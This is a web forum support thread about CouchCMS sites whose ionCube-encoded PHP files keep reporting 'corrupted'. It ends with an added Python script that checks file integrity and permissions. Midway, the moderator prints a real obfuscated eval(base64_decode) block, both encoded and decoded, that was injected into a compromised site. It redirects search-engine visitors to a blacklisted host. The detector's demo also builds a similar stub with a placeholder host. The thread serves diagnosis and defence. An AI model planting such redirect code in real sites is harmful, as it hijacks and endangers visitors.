Problems, need help? Have a tip or advice? Post it here.
13 posts Page 1 of 2
Keep getting:
http://www.ntoupin.net/
"The file /home/ntoupinc/public_html/ntoupin.net/acp/page.php is corrupted."
same thing for all my sites using couch. Copy/overwrite the entire couch w/ original files and it works for a day and then does this again. Nothing else changes on the site at all. Any ideas..?
Makes my site completely unusable..
It could be ionCube related. Here is a quote from their FAQ page (emphasis added):
Q. I get a corrupted file message. Why?
A. The file may really be corrupted, or there may be an old Loader installed that does not recognise the type of encoded file that you have. You can check whether the Loader is already installed by using a phpinfo script, and if a version 2 Loader is installed, e.g. 2.5, then that should be updated to the latest Loader. Corrupted files are rare, but can occur to some types of encoded files if they are uploaded using an FTP program in ASCII mode instead of binary, or if the TAR smart cr/lf conversion feature is enabled in WinZIP. If updating Loaders does not resolve the problem, try reinstalling the PHP script making sure to transfer in binary.
I'm not sure what ftp client you are currently using, but you should try http://filezilla-project.org/. It should automatically use the correct transfer type for each file type.
It is the first time such a problem is being reported.

It could be a problem with IonCube loader.
What is intriguing, though, is that the problem crops up after a day or two of uploading fresh files. This makes me think of a different possibility -

I suspect that your server has been somehow compromised and some rogue program is injecting code into existing PHP files. Doing so to an IonCube encoded file will only make it unusable and ergo the problem.

As to how a server could get compromised - one possible (and the most prevalent) reason is that your local machine is infected. When you use your FTP program from your local machine, some malicious program makes its way onto the server.

The next time this problem crops up, please let us know before trying to rectify it.
I'll want to take a look at the files on your server to confirm (or discard) my fear.

Thanks
As far as there just being a general problem with ioncubes I find it hard to believe that it would be fine when I upload fresh files and a day later they are corrupt causing a problem, especially when I have an identical account at the same webhost (on the same server as well) hosting another site that is also using couchcms and it has not had a problem.

As far as the compromise, I had my webhost scan my entire directory and they found nothing. The corruption just started happening 2 days ago and it was fine all before that (was not touched for over a week before the two days ago when it started happening --- no ftp connections at all)

I scanned my machine locally as well with Malwarebytes, Sophos, & Panda and they found nothing.

I'll post the next time it's up, I'm guessing tomorrow as I just reloaded the files a couple hours ago.
Very confused...
I replaced the couchcms files with the latest stable version (was on the new release that included the gallery feature (1.2.5RC1)) and it has not happened since, nothing else changed other than that. Not sure if there is something within the new release version that did it or what but it seems to be working now on the old version (1.2)
Also, was looking at some of the showcase sites listed here, one has the same corrupt error I was having, not sure if they even know it, with that I don't think it is a localized thing with just me.

viewtopic.php?f=7&t=539

http://www.arsenicdesignlab.com/arsenic/
It is intriguing.
http://www.arsenicdesignlab.com/ in all probability is using a very old version of Couch so that makes version 1.2.5RC a little less suspect.

I'll really want to know what exactly is happening.
I have sent the owner of http://www.arsenicdesignlab.com/ a mail and if he happens to reply and grant me access to the site, I'll get a chance to try and see the problem first-hand.

Will keep you informed.
Googling around for reports of similar problems, I came across only a few instances.

This one has been reported on IonCube's forum and is the closest to the problem we have in hand
http://forum.ioncube.com/viewtopic.php?t=3248
Hi,

I have a website hosted on a Windows machine running Apache and PHP 5.1.
The website is encoded using the ioncube pro encoder php 6.5.

From time to time the website is showing the "index.php is corrupted" message although
the file is not modified.

I copy all the website from a backup and the website is running ok... after a few days or even weeks the message reappears and the website doesn't work. No one is modifying the file, it has the same number of bytes as the backup and the same modify date.

What can it be?

Thanks.

Official reply from IonCube
I've never come across that scenario before, but if it takes a restore of the file to get the site working again, it suggests either that the file has been modified or that there is some other element to the system that is causing an issue. Files can be changed without the file times being changed, and the only way to test for file modification would be by comparing checksums of the file on the server and the master copy. If you find out more information please create a ticket so that we can track the information and securely request private details from you.

All in all, even the guys at IonCube cannot give a definite answer.
I'll wait for a concrete instance of the problem before filing a ticket with ionCube.
True true, alrighty sounds good. If it happens to mine again I'll let you know and give you access to the files before replacing them so you can check it out :).

Nothing like squashing bugs! :P
@ntoupin
Some news for you.
The owner of http://www.arsenicdesignlab.com responded and graciously allowed me access to the site.
As suspected, this is what I found -
Almost every PHP file on his site had this obfuscated code prepended to it
Code:
eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokcWF6cGxtPWhlYWRlcnNfc2VudCgpOw
0KaWYgKCEkcWF6cGxtKXsNCiRyZWZlcmVyPSRfU0VSVkVSWydIVFRQX1JFRkVSRVInXTsNCiR1YWc9JF9T
RVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddOw0KaWYgKCR1YWcpIHsNCmlmICghc3RyaXN0cigkdWFnLCJNU0
lFIDcuMCIpKXsKaWYgKHN0cmlzdHIoJHJlZmVyZXIsInlhaG9vIikgb3Igc3RyaXN0cigkcmVmZXJlciwi
YmluZyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsInJhbWJsZXIiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJnb2
dvIikgb3Igc3RyaXN0cigkcmVmZXJlciwibGl2ZS5jb20iKW9yIHN0cmlzdHIoJHJlZmVyZXIsImFwb3J0
Iikgb3Igc3RyaXN0cigkcmVmZXJlciwibmlnbWEiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJ3ZWJhbHRhIi
kgb3Igc3RyaXN0cigkcmVmZXJlciwiYmVndW4ucnUiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJzdHVtYmxl
dXBvbi5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiaXQubHkiKSBvciBzdHJpc3RyKCRyZWZlcmVyLC
J0aW55dXJsLmNvbSIpIG9yIHByZWdfbWF0Y2goIi95YW5kZXhcLnJ1XC95YW5kc2VhcmNoXD8oLio/KVwm
bHJcPS8iLCRyZWZlcmVyKSBvciBwcmVnX21hdGNoICgiL2dvb2dsZVwuKC4qPylcL3VybFw/c2EvIiwkcm
VmZXJlcikgb3Igc3RyaXN0cigkcmVmZXJlciwibXlzcGFjZS5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVy
LCJmYWNlYm9vay5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJhb2wuY29tIikpIHsNCmlmICghc3RyaX
N0cigkcmVmZXJlciwiY2FjaGUiKSBvciAhc3RyaXN0cigkcmVmZXJlciwiaW51cmwiKSl7DQpoZWFkZXIo
IkxvY2F0aW9uOiBodHRwOi8vZ2lnb3AuYW1lcmljYW51bmZpbmlzaGVkLmNvbS8iKTsNCmV4aXQoKTsNCn
0KfQp9DQp9DQp9"));

Decoded, the bytes above become
Code:
error_reporting(0);
$qazplm=headers_sent();
if (!$qazplm){
   $referer=$_SERVER['HTTP_REFERER'];
   $uag=$_SERVER['HTTP_USER_AGENT'];
   if ($uag) {
      if (!stristr($uag,"MSIE 7.0")){
         if (stristr($referer,"yahoo") or
         stristr($referer,"bing") or
         stristr($referer,"rambler") or
         stristr($referer,"gogo") or
         stristr($referer,"live.com")or
         stristr($referer,"aport") or
         stristr($referer,"nigma") or
         stristr($referer,"webalta") or
         stristr($referer,"begun.ru") or
         stristr($referer,"stumbleupon.com") or
         stristr($referer,"bit.ly") or
         stristr($referer,"tinyurl.com") or
         preg_match("/yandex\.ru\/yandsearch\?(.*?)\&lr\=/",$referer) or
         preg_match ("/google\.(.*?)\/url\?sa/",$referer) or
         stristr($referer,"myspace.com") or
         stristr($referer,"facebook.com") or
         stristr($referer,"aol.com")) {
            if (!stristr($referer,"cache") or !stristr($referer,"inurl")){
               header("Location: http://gigop.americanunfinished.com/");
               exit();
            }
         }
      }
   }
}

As can be seen, the injected code is a 'Conditional redirect malware' and is supposed to redirect users visiting the site through search-engines to http://gigop.americanunfinished.com/ (a black-listed site).

As it happens, Couch's files are Ioncube encoded and the addition of the code only serves to make Ioncube detect that the file has been tampered with and throw the 'File corrupted' error you reported.

In all probability, that is what is happening on your site too.

Although the condition really is unrelated to Couch (a quick Google search will reveal that WordPress and Joomla are the ones most affected), it would be proper to discuss ways of preventing this from happening -
http://redleg-redleg.blogspot.in/2012/0 ... ee-pl.html discusses this very exploit in detail and has a few good tips worth emulating. A few quotes from the site
Most hacked sites I see are due to compromised passwords. Start by doing a scan of your PC and make sure there are no Trojans/viruses capturing your ids/passwords, use a couple of different security packages. Change ALL passwords especially FTP. Never store/save your passwords in your FTP client, use secure FTP if available. Install a good anti-virus program and do regular scans of your computer. Your hosting service may be able to help you pin it down, if you notify them when you see any changes they could check the access logs and maybe determine the account being used when the files are modified.

The second most common thing I see is problems with file/folder permissions. The hackers get access to a site and open the file permissions up on a folder/file so they can continue to get access even if you change passwords etc. You'll see different views on what permissions should be; I go with Files set to 644, Folders set to 755. It is a good idea to regularly check file/folder permissions.

Make sure you are running the latest versions and security patches of all software, CMS, Plugins, themes etc.

Frequently I also see hackers leave a backdoor on a site. This is usually a php file hidden away somewhere with system files, /cgi-bin/ used to be a popular place. This will be a php file that is not part of your site and it will contain a bunch of obfuscated stuff. There is an excellent article with some tips on how to find a backdoor from 25 Years of Programming -- Website security: How to find backdoor PHP shell scripts on a server.

If you have not already done so, I suggest you start by scanning your PC for trojans etc., then change all passwords, make sure your FTP account is not compromised. Check all folder/file permissions and make sure they are locked down.

And as a word of caution, do NOT use the FileZilla FTP client to transfer the files. It stores all passwords in plain text format, so if your PC gets compromised your passwords stored in it will get stolen as well.

Hope this helps.
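The ionCube reply above suggests comparing checksums of the server copy against the master copy (since a file can be rewritten without its modify date changing), and the quoted article recommends checking for prepended obfuscated code and for opened-up permissions. The following script, an added example that is not code from CouchCMS, ionCube or anyone in this thread, does those three checks on a directory tree. Everything it scans is constructed inside a temporary directory by demo(): the acp/ folder, the placeholder PHP files, and the eval(base64_decode(...)) stub pointing at the placeholder host redirect.example.invalid are all assumptions made for the demonstration; on a real account you would run build_manifest() on the freshly uploaded files, keep the manifest off-server, and run the other functions whenever the "file is corrupted" error reappears.

```python
"""Baseline, tamper and permission checks for a PHP site tree (added example)."""
import base64
import hashlib
import os
import re
import stat
import tempfile

# The shape of the prepended loader seen on the compromised site in the thread:
# eval(base64_decode("...")). Whitespace is allowed inside the blob because
# forum posts and some injectors wrap it across lines.
EVAL_B64 = re.compile(rb'eval\s*\(\s*base64_decode\s*\(\s*["\']([A-Za-z0-9+/=\s]+)["\']\s*\)\s*\)')

EXPECTED_FILE_MODE = 0o644   # the article's recommendation for files
EXPECTED_DIR_MODE = 0o755    # and for folders

def sha256_of(path):
    h = hashlib.sha256()
    with open(path, 'rb') as f:
        for chunk in iter(lambda: f.read(65536), b''):
            h.update(chunk)
    return h.hexdigest()

def build_manifest(root):
    """Map relative path -> sha256 for every file under root (the 'master copy')."""
    manifest = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            manifest[os.path.relpath(full, root)] = sha256_of(full)
    return manifest

def compare_manifest(root, manifest):
    """Return (modified, added, missing) relative paths versus the baseline.
    Content hashes are compared, so a file rewritten with its mtime restored is still caught."""
    current = build_manifest(root)
    modified = sorted(p for p in manifest if p in current and current[p] != manifest[p])
    added = sorted(p for p in current if p not in manifest)
    missing = sorted(p for p in manifest if p not in current)
    return modified, added, missing

def find_injected_eval(path):
    """Return the decoded payload text if the file carries an eval(base64_decode(...)) block, else None."""
    with open(path, 'rb') as f:
        data = f.read()
    m = EVAL_B64.search(data)
    if not m:
        return None
    blob = re.sub(rb'\s+', b'', m.group(1))
    try:
        return base64.b64decode(blob, validate=True).decode('utf-8', 'replace')
    except ValueError:   # binascii.Error is a ValueError subclass
        return '<undecodable payload>'

def check_permissions(root):
    """List (relative path, octal mode) for entries that deviate from 644 / 755."""
    bad = []
    for dirpath, dirs, files in os.walk(root):
        for name, expected in [(d, EXPECTED_DIR_MODE) for d in dirs] + \
                              [(f, EXPECTED_FILE_MODE) for f in files]:
            full = os.path.join(dirpath, name)
            mode = stat.S_IMODE(os.lstat(full).st_mode)
            if mode != expected:
                bad.append((os.path.relpath(full, root), oct(mode)))
    return sorted(bad)

def demo():
    """Constructed miniature site; simulates the tampering described in the thread."""
    root = tempfile.mkdtemp(prefix='site_demo_')
    site = os.path.join(root, 'acp')            # hypothetical folder name
    os.makedirs(site)
    for name in ('page.php', 'index.php'):
        p = os.path.join(site, name)
        with open(p, 'wb') as f:
            f.write(b"<?php\n// placeholder standing in for an encoded file\n")
        os.chmod(p, EXPECTED_FILE_MODE)
    os.chmod(site, EXPECTED_DIR_MODE)
    baseline = build_manifest(root)            # taken right after a clean upload

    # Constructed payload with a placeholder redirect host, prepended like the real one.
    payload = (b"error_reporting(0);\n"
               b"if (stristr($_SERVER['HTTP_REFERER'], 'google')) {\n"
               b"  header('Location: http://redirect.example.invalid/');\n  exit();\n}\n")
    stub = b'<?php eval(base64_decode("' + base64.b64encode(payload) + b'")); ?>'
    target = os.path.join(site, 'page.php')
    before = os.stat(target)
    with open(target, 'rb') as f:
        original = f.read()
    with open(target, 'wb') as f:
        f.write(stub + original)
    os.utime(target, (before.st_atime, before.st_mtime))   # mtime restored: a date check would miss it
    os.chmod(site, 0o777)                                  # an opened-up folder, as the article warns

    modified, added, missing = compare_manifest(root, baseline)
    payloads = {p: find_injected_eval(os.path.join(root, p)) for p in modified}
    return {'modified': modified, 'added': added, 'missing': missing,
            'payloads': payloads, 'bad_perms': check_permissions(root)}

if __name__ == '__main__':
    for key, value in demo().items():
        print(key, '->', value)
```

The manifest should be generated from the local master copy or immediately after a clean upload, and stored somewhere the web server account cannot write; a baseline kept next to the files can be rewritten by the same process that rewrites the files.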